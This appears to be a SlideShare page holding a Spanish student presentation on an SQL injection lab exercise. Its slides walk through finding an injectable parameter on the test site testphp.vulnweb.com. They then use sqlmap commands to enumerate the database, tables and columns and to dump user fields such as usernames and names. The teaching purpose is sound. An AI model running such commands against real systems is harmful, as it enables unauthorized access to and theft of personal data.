SlideShare una empresa de Scribd logo

Presentación ataque 1 sql

Descargar como PPTX, PDF
Alexander Valderrama
Alexander Valderrama

Presentación, a cerca del ataque por Inyección de Código SQL

Software
1 de 17
1. Ataque por inyección de código SQL. Descargue e instale la máquina virtual Virtualbox. - Descargue BadStore. - Descargue un programa para realizar ataque por inyección de código SQL sesugiere SQLMAP (http://sqlmap.org/) o Nmap (http://nmap.org/download.html. - Realizar un ataque a la base de datos de Badstore, con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc. - Realizar una presentación o video sobre el ataque realizado.
Para determinar la vulnerabilidad del sitio que se nos dá, debemos colocar una comilla al lado del signo igual y actualizamos la página y esto nos debe indicar que tiene un error de sintaxis en la instrucción SQL, lo que lo hace vulnerable al ataque. Entonces copiamos la URL y lo copiamos en el comando del software sqlmap y ejecutamos presionando la tecla Enter  sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?artist=1 –bds Este comando nos permitirá conocer el nombre de la base de datos, como lo muestra la siguiente gráfica
Conociendo el nombre de la base de datos podemos ahora conocer las tablas que hacen parte de esa base de datos por medio del siguiente comando  sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?artist=1 -D acuart –tables De este modo podremos conocer el nombre de las tablas, que hacen parte de esa base de datos
Una vez identificadas las tablas podremos conocer, las columnas de cada tabla, para ello debemos digitar el siguiente comando.  sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?artist=1 -D acuart - T users –columns Este comando nos mostrará, las columnas de la table Users, tal como lo muestra la siguiente gráfica.
Luego conocer las columnas de la tabla Users, debemos conocer el contenido de algunos de los campos, de dicha tabla. Por medio del siguiente comando podremos conocer el contenido del campo Uname, por medio del siguiente comando: sqlmap.py -u  http://testphp.vulnweb.com/listproducts.php?artist=1 -D acuart -T users -C uname –dump La siguiente gráfica nos muestra el contenido del campo uname
Así mismo para los campos restantes, tales como el contenido del campo name, por medio del siguiente comando. sqlmap.py -u  http://testphp.vulnweb.com/listproducts.php?artist=1 -D acuart -T users -C name –dump La siguiente gráfica muestra el contenido del campo Name, en la table acuart
Y podemos seguir conociendo más datos de la tabla usuarios, ahora lo vamos a hacer con el campo email
Por si quedan dudas extraemos la información de la cedula
Presentación ataque 1 sql

Recomendados

ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFINGATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFINGalexander valencia valderrama
 
2. ataque por inyección de código sql a sitio web
2. ataque por inyección de código sql a sitio web2. ataque por inyección de código sql a sitio web
2. ataque por inyección de código sql a sitio webJOSE ALFREDO RAMIREZ PRADA
 
Ataque sql web
Ataque sql webAtaque sql web
Ataque sql webkateqr
 
Presentacion practica seguridad bd
Presentacion practica seguridad bdPresentacion practica seguridad bd
Presentacion practica seguridad bdJaider Contreras
 
Manual de uso de phpmyadmin
Manual de uso de phpmyadminManual de uso de phpmyadmin
Manual de uso de phpmyadminComplethost Soluciones Internet
 
Instalacion roms
Instalacion romsInstalacion roms
Instalacion romsErnesto Arreaga Carvajal
 
Taller de Macro Tecnologia IELD
Taller de Macro Tecnologia IELDTaller de Macro Tecnologia IELD
Taller de Macro Tecnologia IELDJuan Vidarte
 
Variable de entorno
Variable de entornoVariable de entorno
Variable de entornoJënn Flöwërs
 

Recomendados

ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFINGATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFINGalexander valencia valderrama
 
2. ataque por inyección de código sql a sitio web
2. ataque por inyección de código sql a sitio web2. ataque por inyección de código sql a sitio web
2. ataque por inyección de código sql a sitio webJOSE ALFREDO RAMIREZ PRADA
 
Ataque sql web
Ataque sql webAtaque sql web
Ataque sql webkateqr
 
Presentacion practica seguridad bd
Presentacion practica seguridad bdPresentacion practica seguridad bd
Presentacion practica seguridad bdJaider Contreras
 
Manual de uso de phpmyadmin
Manual de uso de phpmyadminManual de uso de phpmyadmin
Manual de uso de phpmyadminComplethost Soluciones Internet
 
Instalacion roms
Instalacion romsInstalacion roms
Instalacion romsErnesto Arreaga Carvajal
 
Taller de Macro Tecnologia IELD
Taller de Macro Tecnologia IELDTaller de Macro Tecnologia IELD
Taller de Macro Tecnologia IELDJuan Vidarte
 
Variable de entorno
Variable de entornoVariable de entorno
Variable de entornoJënn Flöwërs
 
C evaluacion y competencias diapo (1)
C evaluacion y competencias diapo (1)C evaluacion y competencias diapo (1)
C evaluacion y competencias diapo (1)Claudia Flórez
 
No a la muerte de animales
No a la muerte de animalesNo a la muerte de animales
No a la muerte de animalesRuthBeatriz2013
 
Practica 3
Practica 3Practica 3
Practica 3Esmee Teo
 
SITUACION PROBLEMA FINAL 4°AÑO PROFR. JULIO C. LOPEZ
SITUACION PROBLEMA FINAL 4°AÑO PROFR. JULIO C. LOPEZSITUACION PROBLEMA FINAL 4°AÑO PROFR. JULIO C. LOPEZ
SITUACION PROBLEMA FINAL 4°AÑO PROFR. JULIO C. LOPEZjulio2102lopez
 
Materiales que se usan en informatica
Materiales que se usan en informaticaMateriales que se usan en informatica
Materiales que se usan en informaticalahechizera
 
Practica 1
Practica 1Practica 1
Practica 1Esmee Teo
 
marketing-estrategico
marketing-estrategicomarketing-estrategico
marketing-estrategicoflor montoya
 
La contabilidad
La contabilidadLa contabilidad
La contabilidadbetzabethlander
 
La sunat
La sunatLa sunat
La sunatMary Luz Gloria Rojas López
 
Trabajo de religion
Trabajo de religionTrabajo de religion
Trabajo de religionMary Luz Gloria Rojas López
 
Introducción convenio ina
Introducción convenio inaIntroducción convenio ina
Introducción convenio inaOficina Regional de la FAO para América Latina y el Caribe
 
Educacindelsigloxxi1 120304231045-phpapp02
Educacindelsigloxxi1 120304231045-phpapp02Educacindelsigloxxi1 120304231045-phpapp02
Educacindelsigloxxi1 120304231045-phpapp02elliswengtest
 
Feria de Cuenca 2006
Feria de Cuenca 2006Feria de Cuenca 2006
Feria de Cuenca 2006Manuel Álvarez Reyes
 
Ruta pedagógica tdah
Ruta pedagógica tdahRuta pedagógica tdah
Ruta pedagógica tdahLiliana Parra
 
Aprende Tic
Aprende TicAprende Tic
Aprende TicNathaly Ortiz Fernandez
 
Prueba de computación
Prueba de computaciónPrueba de computación
Prueba de computaciónDani Lilibeth
 
Leccion 3 bloque 2
Leccion 3 bloque 2Leccion 3 bloque 2
Leccion 3 bloque 2Alexia Tirado Reyes
 
Roberto Torres Gonzales
Roberto Torres GonzalesRoberto Torres Gonzales
Roberto Torres GonzalesPamela Patiño
 
Capitulo i ii java
Capitulo i ii javaCapitulo i ii java
Capitulo i ii javaflor montoya
 
La importancia de las tics en méxico
La importancia de las tics en méxicoLa importancia de las tics en méxico
La importancia de las tics en méxicoViiviiz D Jezuz Enriiqkez
 
Ataque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffingAtaque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffingMagda Mayery Baquero Cardona
 
Ataque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webAtaque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webDaycith Gonzalez
 

Más contenido relacionado

Destacado

C evaluacion y competencias diapo (1)
C evaluacion y competencias diapo (1)C evaluacion y competencias diapo (1)
C evaluacion y competencias diapo (1)Claudia Flórez
 
No a la muerte de animales
No a la muerte de animalesNo a la muerte de animales
No a la muerte de animalesRuthBeatriz2013
 
SITUACION PROBLEMA FINAL 4°AÑO PROFR. JULIO C. LOPEZ
SITUACION PROBLEMA FINAL 4°AÑO PROFR. JULIO C. LOPEZSITUACION PROBLEMA FINAL 4°AÑO PROFR. JULIO C. LOPEZ
SITUACION PROBLEMA FINAL 4°AÑO PROFR. JULIO C. LOPEZjulio2102lopez
 
Materiales que se usan en informatica
Materiales que se usan en informaticaMateriales que se usan en informatica
Materiales que se usan en informaticalahechizera
 
marketing-estrategico
marketing-estrategicomarketing-estrategico
marketing-estrategicoflor montoya
 
Educacindelsigloxxi1 120304231045-phpapp02
Educacindelsigloxxi1 120304231045-phpapp02Educacindelsigloxxi1 120304231045-phpapp02
Educacindelsigloxxi1 120304231045-phpapp02elliswengtest
 
Ruta pedagógica tdah
Ruta pedagógica tdahRuta pedagógica tdah
Ruta pedagógica tdahLiliana Parra
 
Prueba de computación
Prueba de computaciónPrueba de computación
Prueba de computaciónDani Lilibeth
 
Roberto Torres Gonzales
Roberto Torres GonzalesRoberto Torres Gonzales
Roberto Torres GonzalesPamela Patiño
 
Capitulo i ii java
Capitulo i ii javaCapitulo i ii java
Capitulo i ii javaflor montoya
 

Destacado (20)

C evaluacion y competencias diapo (1)
C evaluacion y competencias diapo (1)C evaluacion y competencias diapo (1)
C evaluacion y competencias diapo (1)
 
No a la muerte de animales
No a la muerte de animalesNo a la muerte de animales
No a la muerte de animales
 
Practica 3
Practica 3Practica 3
Practica 3
 
SITUACION PROBLEMA FINAL 4°AÑO PROFR. JULIO C. LOPEZ
SITUACION PROBLEMA FINAL 4°AÑO PROFR. JULIO C. LOPEZSITUACION PROBLEMA FINAL 4°AÑO PROFR. JULIO C. LOPEZ
SITUACION PROBLEMA FINAL 4°AÑO PROFR. JULIO C. LOPEZ
 
Materiales que se usan en informatica
Materiales que se usan en informaticaMateriales que se usan en informatica
Materiales que se usan en informatica
 
Practica 1
Practica 1Practica 1
Practica 1
 
marketing-estrategico
marketing-estrategicomarketing-estrategico
marketing-estrategico
 
La contabilidad
La contabilidadLa contabilidad
La contabilidad
 
La sunat
La sunatLa sunat
La sunat
 
Trabajo de religion
Trabajo de religionTrabajo de religion
Trabajo de religion
 
Introducción convenio ina
Introducción convenio inaIntroducción convenio ina
Introducción convenio ina
 
Educacindelsigloxxi1 120304231045-phpapp02
Educacindelsigloxxi1 120304231045-phpapp02Educacindelsigloxxi1 120304231045-phpapp02
Educacindelsigloxxi1 120304231045-phpapp02
 
Feria de Cuenca 2006
Feria de Cuenca 2006Feria de Cuenca 2006
Feria de Cuenca 2006
 
Ruta pedagógica tdah
Ruta pedagógica tdahRuta pedagógica tdah
Ruta pedagógica tdah
 
Aprende Tic
Aprende TicAprende Tic
Aprende Tic
 
Prueba de computación
Prueba de computaciónPrueba de computación
Prueba de computación
 
Leccion 3 bloque 2
Leccion 3 bloque 2Leccion 3 bloque 2
Leccion 3 bloque 2
 
Roberto Torres Gonzales
Roberto Torres GonzalesRoberto Torres Gonzales
Roberto Torres Gonzales
 
Capitulo i ii java
Capitulo i ii javaCapitulo i ii java
Capitulo i ii java
 
La importancia de las tics en méxico
La importancia de las tics en méxicoLa importancia de las tics en méxico
La importancia de las tics en méxico
 

Similar a Presentación ataque 1 sql

Ataque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webAtaque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webDaycith Gonzalez
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuDavid Vevelas
 
MySQL - SQL.pdf
MySQL - SQL.pdfMySQL - SQL.pdf
MySQL - SQL.pdfkabern
 
MySQL.pdf
MySQL.pdfMySQL.pdf
MySQL.pdfkabern
 
Tutorial de my sql workbench
Tutorial de my sql workbenchTutorial de my sql workbench
Tutorial de my sql workbenchPaolaEsquer14
 
Colegio+de+estudios+cientificos+y+tecnologicos+del+estado+de+mexico
Colegio+de+estudios+cientificos+y+tecnologicos+del+estado+de+mexicoColegio+de+estudios+cientificos+y+tecnologicos+del+estado+de+mexico
Colegio+de+estudios+cientificos+y+tecnologicos+del+estado+de+mexico25415252
 
M2 com practico_arodri
M2 com practico_arodriM2 com practico_arodri
M2 com practico_arodriarodri7703
 
15894 pr cctica-3-introducciun-al-matlab-simulink
15894 pr cctica-3-introducciun-al-matlab-simulink15894 pr cctica-3-introducciun-al-matlab-simulink
15894 pr cctica-3-introducciun-al-matlab-simulinkFrank Arias Beltran
 
TUTORIAL DE MySQL WORKBENCH
TUTORIAL DE MySQL WORKBENCHTUTORIAL DE MySQL WORKBENCH
TUTORIAL DE MySQL WORKBENCHkelsy98
 
Manual civil ads 1.0
Manual civil ads 1.0Manual civil ads 1.0
Manual civil ads 1.0erslide71
 
MANUAL CIVIL ADS 1.0 manual de red saniataria.pdf
MANUAL CIVIL ADS 1.0 manual de red saniataria.pdfMANUAL CIVIL ADS 1.0 manual de red saniataria.pdf
MANUAL CIVIL ADS 1.0 manual de red saniataria.pdfALFREDO LOZANO BERNAL
 
Sql desde cero
Sql desde ceroSql desde cero
Sql desde ceroshochino
 
44612647 guia-de-instalacion-de-cacti-probada-en-cent os-5-5
44612647 guia-de-instalacion-de-cacti-probada-en-cent os-5-544612647 guia-de-instalacion-de-cacti-probada-en-cent os-5-5
44612647 guia-de-instalacion-de-cacti-probada-en-cent os-5-5pablogarlandeira
 

Similar a Presentación ataque 1 sql (20)

Ataque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffingAtaque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffing
 
Ataque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio webAtaque con inyeccion de codigo sql a sitio web
Ataque con inyeccion de codigo sql a sitio web
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntu
 
Textos sqli_mssql
Textos sqli_mssql Textos sqli_mssql
Textos sqli_mssql
 
MySQL - SQL.pdf
MySQL - SQL.pdfMySQL - SQL.pdf
MySQL - SQL.pdf
 
MySQL.pdf
MySQL.pdfMySQL.pdf
MySQL.pdf
 
Tutorial de my sql workbench
Tutorial de my sql workbenchTutorial de my sql workbench
Tutorial de my sql workbench
 
Colegio+de+estudios+cientificos+y+tecnologicos+del+estado+de+mexico
Colegio+de+estudios+cientificos+y+tecnologicos+del+estado+de+mexicoColegio+de+estudios+cientificos+y+tecnologicos+del+estado+de+mexico
Colegio+de+estudios+cientificos+y+tecnologicos+del+estado+de+mexico
 
M2 com practico_arodri
M2 com practico_arodriM2 com practico_arodri
M2 com practico_arodri
 
15894 pr cctica-3-introducciun-al-matlab-simulink
15894 pr cctica-3-introducciun-al-matlab-simulink15894 pr cctica-3-introducciun-al-matlab-simulink
15894 pr cctica-3-introducciun-al-matlab-simulink
 
Manual r comander
Manual r comanderManual r comander
Manual r comander
 
Ataques a bases de datos
Ataques a bases de datosAtaques a bases de datos
Ataques a bases de datos
 
TUTORIAL DE MySQL WORKBENCH
TUTORIAL DE MySQL WORKBENCHTUTORIAL DE MySQL WORKBENCH
TUTORIAL DE MySQL WORKBENCH
 
Practica 11
Practica 11Practica 11
Practica 11
 
Articulo ieee ataque_i
Articulo ieee ataque_iArticulo ieee ataque_i
Articulo ieee ataque_i
 
Manual civil ads 1.0
Manual civil ads 1.0Manual civil ads 1.0
Manual civil ads 1.0
 
MANUAL CIVIL ADS 1.0 manual de red saniataria.pdf
MANUAL CIVIL ADS 1.0 manual de red saniataria.pdfMANUAL CIVIL ADS 1.0 manual de red saniataria.pdf
MANUAL CIVIL ADS 1.0 manual de red saniataria.pdf
 
Mysql
MysqlMysql
Mysql
 
Sql desde cero
Sql desde ceroSql desde cero
Sql desde cero
 
44612647 guia-de-instalacion-de-cacti-probada-en-cent os-5-5
44612647 guia-de-instalacion-de-cacti-probada-en-cent os-5-544612647 guia-de-instalacion-de-cacti-probada-en-cent os-5-5
44612647 guia-de-instalacion-de-cacti-probada-en-cent os-5-5
 

Presentación ataque 1 sql

  • 1.
  • 2. 1. Ataque por inyección de código SQL. Descargue e instale la máquina virtual Virtualbox. - Descargue BadStore. - Descargue un programa para realizar ataque por inyección de código SQL sesugiere SQLMAP (http://sqlmap.org/) o Nmap (http://nmap.org/download.html. - Realizar un ataque a la base de datos de Badstore, con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc. - Realizar una presentación o video sobre el ataque realizado.
  • 3.
  • 4.
  • 5. Para determinar la vulnerabilidad del sitio que se nos dá, debemos colocar una comilla al lado del signo igual y actualizamos la página y esto nos debe indicar que tiene un error de sintaxis en la instrucción SQL, lo que lo hace vulnerable al ataque. Entonces copiamos la URL y lo copiamos en el comando del software sqlmap y ejecutamos presionando la tecla Enter  sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?artist=1 –bds Este comando nos permitirá conocer el nombre de la base de datos, como lo muestra la siguiente gráfica
  • 6.
  • 7. Conociendo el nombre de la base de datos podemos ahora conocer las tablas que hacen parte de esa base de datos por medio del siguiente comando  sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?artist=1 -D acuart –tables De este modo podremos conocer el nombre de las tablas, que hacen parte de esa base de datos
  • 8.
  • 9. Una vez identificadas las tablas podremos conocer, las columnas de cada tabla, para ello debemos digitar el siguiente comando.  sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?artist=1 -D acuart - T users –columns Este comando nos mostrará, las columnas de la table Users, tal como lo muestra la siguiente gráfica.
  • 10.
  • 11. Luego conocer las columnas de la tabla Users, debemos conocer el contenido de algunos de los campos, de dicha tabla. Por medio del siguiente comando podremos conocer el contenido del campo Uname, por medio del siguiente comando: sqlmap.py -u  http://testphp.vulnweb.com/listproducts.php?artist=1 -D acuart -T users -C uname –dump La siguiente gráfica nos muestra el contenido del campo uname
  • 12.
  • 13. Así mismo para los campos restantes, tales como el contenido del campo name, por medio del siguiente comando. sqlmap.py -u  http://testphp.vulnweb.com/listproducts.php?artist=1 -D acuart -T users -C name –dump La siguiente gráfica muestra el contenido del campo Name, en la table acuart
  • 14.
  • 15. Y podemos seguir conociendo más datos de la tabla usuarios, ahora lo vamos a hacer con el campo email
  • 16. Por si quedan dudas extraemos la información de la cedula